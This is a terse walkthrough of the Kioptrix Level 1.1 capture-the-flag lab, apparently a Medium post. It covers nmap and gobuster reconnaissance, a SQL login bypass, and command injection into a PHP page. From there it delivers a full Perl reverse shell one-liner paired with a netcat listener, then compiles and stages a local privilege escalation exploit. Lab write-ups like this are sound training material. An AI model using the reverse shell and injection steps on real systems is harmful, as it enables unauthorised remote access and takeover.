Kioptrix: Level 1.1 (#2) Walkthrough,23/


So letz find out the IP of the Kioptrix. For that we use the command;

The highlighted IP is our Kioptrix machine IP
nmap -sC -sV

Port 80:

We visit the webpage hosted on port 80
We see some kind of login page
Nothing interesting
gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Let run in the background
Username & password same
SELECT * FROM USERS WHERE username=’’ AND password=’’


Now letz try Command Injection.Using the Wappalyzer extension we know that the page is PHP based so;

;bash — version
;perl -v
nc -nlvp 443
in our terminal
In Webpage
perl -e 'use Socket;$i="";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
We are not root user


So now letz escalate our privileges:

cat /proc/version
gedit exploit.c
clang -o exploit -m32 exploit.c
mv exploit /var/www/html
service apache2 start
chmod 755 exploit



Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store